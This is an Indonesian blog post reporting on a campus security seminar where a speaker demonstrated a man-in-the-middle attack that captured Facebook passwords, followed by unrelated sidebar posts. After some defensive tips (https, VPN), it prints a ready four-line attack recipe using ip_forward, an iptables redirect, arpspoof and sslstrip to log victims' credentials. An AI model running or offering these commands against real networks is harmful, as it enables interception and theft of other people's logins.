Skip to main content

Possibility Hacking: MitM Attack Menggunakan BackTrack

Ide awalnya saya ingin menulis ini saat acara berlangsung. Berhubung acaranya sangat menarik, membuat saya jadi tidak sempat untuk menulis langsung saat acara. Kebetulan saya juga ikut melakukan demo yang dilakukan nara sumber.

Seminar tentang keamanan yang diselenggarakan oleh Himpunan Mahasiswa Teknik Informatika UPN "Veteran" Yogyakarta menghadirkan 2 narasumber dari Komunitas BackTrack Indonesia, +AbrĂ£o Ximenes dan Hat Secure, +novizul evendi  . Topik yang disampaikan oleh Abrao selaku nara sumber pertama adalah tentang Man in the Middle (MitM) Attack. Di awal Abrao menjelaskan konsep dasar MitM Attack yang tanpa disadari oleh orang lain. Konsep dasar tersebut dapat Anda baca lebih lanjut di  http://www.ilmuhacking.com/basic-concept/mengenal-serangan-man-in-the-middle-mitm/.
Abrao Saat Menyampaikan Materi
Tidak sekedar mengupas atau menjelaskan konsep dasar Abrao mendemokan MitM Attack menggunakan BackTrack. Terlihat jelas saat mendemokan harus mempunyai kemampuan dasar tentang sistem operasi Linux karena BackTrack merupakan sistem operasi berbasis Linux. Dalam hal ini sistem operasi Ubuntu yang telah dikustomisasi untuk keamanan sistem dan jaringan komputer. Tidak lupa Abrao mengenalkan beberapa alat bantu yang tersedia di BackTrack.

Saat sesi demonstrasi, cukup mengagetkan dalam hitungan detik saat ada orang yang mengakses Facebook langsung tercatat password dari sang pengakses. Kebetulan Abrao telah menjalankan proses penyerangan dengan menggunakan alat bantu yang sudah tersedia di  sistem operasi BackTrack. Jika saat ini peserta membawa notebook bisa mencoba BackTrack secara langsung karena sudah disediakan CD BackTrack oleh panitia penyelenggara. 

Melihat demonstrasi tersebut membuat kita harus lebih waspada saat mengakses sebuah situs web. Abrao memberikan sarankan, supaya kita lebih berhati-hati dan cermat dalam mengakses situs web. Adapun sarannya sebagai berikut:
1. Memastikan konten dan alamat yang dituju menggunakan protokol  aman contohnya: https
2. Menggunakan komunikasi data pribadi seperti akses broadband atau 
3. Menggunakan Virtual Private Network.  
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo arpspoof -i wlan0 192.168.0.102 192.168.0.254
sudo sslstrip -a -w ~/fb.log
selamat membaca log




Comments

Popular posts from this blog

Kesalahan Dispenser

Pada umumnya beberapa orang menyebut dispenser mengikuti istilah pada KBBI yaitu peranti elektronik yg secara otomatis dapat memanaskan dan mendinginkan air yang siap diminum. Ternyata ada istilah lain menurut KBBI yaitu mesin penjual atau mesin penyaji. 27 Desember 2013 saya melihat Anjungan Tunai Mandiri (ATM) dari Bank CIMB Niaga sepi dari antrian. Masuklah ke ruangan yang lebih besar dibanding ruang ATM lainnya. Berencana mengambil uang namun gagal, dicoba berulang-ulang ternyata masih gagal dengan pesan galat: Transaksi tidak dapat diproses karena kesalahan dispenser Pertama melihat pesan tersebut pasti merasa aneh, kok dispenser ngeluarin uang, air dong yang dikeluarkan . Termasuk saya yang merasa aneh dengan pesan galat tersebut. Merujuk KBBI saya masih merenungi arti dispenser yang digunakan Bank CIMB Niaga dalam mesin ATM.

Tidak Mudah Melacak Ponsel atau Modem Hilang

Setelah kejadian pencurian dirumah , saya baru sempat tadi pagi menghubungi pihak operator. Alat komunikasi berserta kartu dari operator pun lenyap dibawa oleh maling. Sehingga sampai saat ini saya juga sulit komunikasi melalui jalur internet maupun ponsel. Ponsel sulit dihubungi karena charger ponsel pun dibawa maling :(. Sementara masih pinjam teman kantor :D.  Per hari ini, tanggal 15 Maret 2010 saya tidak berlangganan internet sampai batas waktu yang ditentukan. Alasan saya berhenti sementara (3 bulan batas maksimal dari operator) sangat sederhana yaitu pihak operator belum/tidak bisa melacak ponsel atau modem yang hilang. Saya pikir mudah melacak keberadaan ponsel atau modem mudah sesuai artikel yang saya baca di http://www.scribd.com/doc/6303977/ThorpeGlen-Cell-Snooping-Sales-Presentation-2008 :D Ternyata saya ingin tahu keberadaan ponsel atau modem ternyata belum/tidak bisa.Padahal hilangnya ponsel dan modem saya mengandung unsur tindak pidana. Yaaa... apa boleh buat mun...

[lirik] Nidji feat Agnes Monica - One Heart

Saat iklan Honda dengan tema One Heart tampil di telivisi langsung membuat saya tertarik untuk didengarkan berulang-ulang. Jingle dengan durasi 1 menit ini dinyanyikan oleh Nidji bersama Agnes Monica. Lirik jingle One Heart dapat dilihat dibawah ini : Kita sangatlah beda Jalani hidup kita Tapi kita satu Mimpi kita satu Bersama jelajah dunia Buanglah semua ragumu One Heart... One Heart Terus melangkah bersama satu hati One Heart, One Heart Ooo One Heart One Heart... One Heart Terus melaju lupakan masa lalu One Heart, One Heart Ooo One Heart